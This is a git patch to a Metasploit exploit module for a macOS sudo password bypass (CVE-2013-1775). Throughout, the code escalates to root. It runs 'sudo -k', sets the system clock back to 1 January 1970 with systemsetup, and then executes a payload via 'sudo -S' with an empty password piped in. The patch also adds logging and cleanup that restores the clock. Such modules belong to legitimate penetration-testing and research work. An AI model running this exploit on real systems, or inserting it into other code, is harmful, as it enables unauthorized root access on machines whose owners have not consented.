From fc91380ebcf83ac2bccf57b0eaa279162e2f6464 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 23 Aug 2013 17:54:21 -0500 Subject: [PATCH] Add work code --- .../osx/local/sudo_password_bypass.rb | 91 ++++++++++++++----- 1 file changed, 70 insertions(+), 21 deletions(-) diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index 127faf0018..c8295a28ca 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -42,33 +42,34 @@ class Metasploit3 < Msf::Exploit::Local 'Todd C. Miller', # Vulnerability discovery 'joev ' # Metasploit module ], - 'Platform' => [ 'osx' ], - 'SessionTypes' => [ 'shell', 'meterpreter'], 'References' => [ ['CVE', '2013-1775'], ['OSVDB', '90677'] ], 'Platform' => 'osx', - 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], + 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ], + 'SessionTypes' => [ 'shell', 'meterpreter'], 'Targets' => [ - [ 'Mac OS X x86 (Native Payload)', { + [ 'Mac OS X x86 (Native Payload)', + { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ], - [ 'Mac OS X x64 (Native Payload)', { + [ 'Mac OS X x64 (Native Payload)', + { 'Platform' => 'osx', - 'Arch' => ARCH_X64 + 'Arch' => ARCH_X86_64 } ], - [ 'CMD', { + [ 'CMD', + { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ] ], - 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 28 2013' )) @@ -115,30 +116,48 @@ class Metasploit3 < Msf::Exploit::Local print_status("Payload dropped and registered for cleanup") end + print_status("Executing: #{SYSTEMSETUP_PATH} -gettime") @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1] + print_status("Executing: #{SYSTEMSETUP_PATH} -getdate") @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1] + print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime") @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/) + print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone") @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1] @network_server = if @networked + print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver") cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1] end + + print_warning("Cleanup to be done in case something goes really bad") + print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") + print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") + print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") + if @networked + print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On") + if @network_server + print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}") + end + end + run_sudo_cmd end end def cleanup - return if @_cleaning_up - @_cleaning_up = true + print_status("cleanup callback") + if not @_cleaning_up + @_cleaning_up = true + do_cleanup + end + super + end - print_status("Resetting system clock to original values") if @time - cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil? - cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil? - cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil? - if @networked - cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On") - unless @network_server.nil? - cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}") - end + def on_new_session(session) + print_status("on_new_session callback") + if not @_cleaning_up + @_cleaning_up = true + do_cleanup end super end @@ -152,9 +171,17 @@ class Metasploit3 < Msf::Exploit::Local ['sudo', '-S', payload.encoded].join(' ') end - # to prevent the password prompt from destroying session - sudo_cmd = 'echo "" | '+sudo_cmd_raw + # Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved + sudo_cmd_raw.gsub!(/python/, "/usr/bin/python") + sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby") + sudo_cmd_raw.gsub!(/sh/, "/bin/sh") + ## to prevent the password prompt from destroying session + sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5' + + print_status("Executing: sudo -k; \n"+ + "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+ + " -settimezone GMT -settime 00:00") cmd_exec( "sudo -k; \n"+ "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+ @@ -173,6 +200,28 @@ class Metasploit3 < Msf::Exploit::Local print_good output end + def do_cleanup + print_status("Resetting system clock to original values") if @time + + print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") + cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil? + + print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") + cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil? + + print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") + cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil? + + if @networked + print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On") + cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On") + unless @network_server.nil? + print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}") + cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}") + end + end + end + # helper methods for accessing datastore def using_native_target?; target.name =~ /native/i; end def using_cmd_target?; target.name =~ /cmd/i; end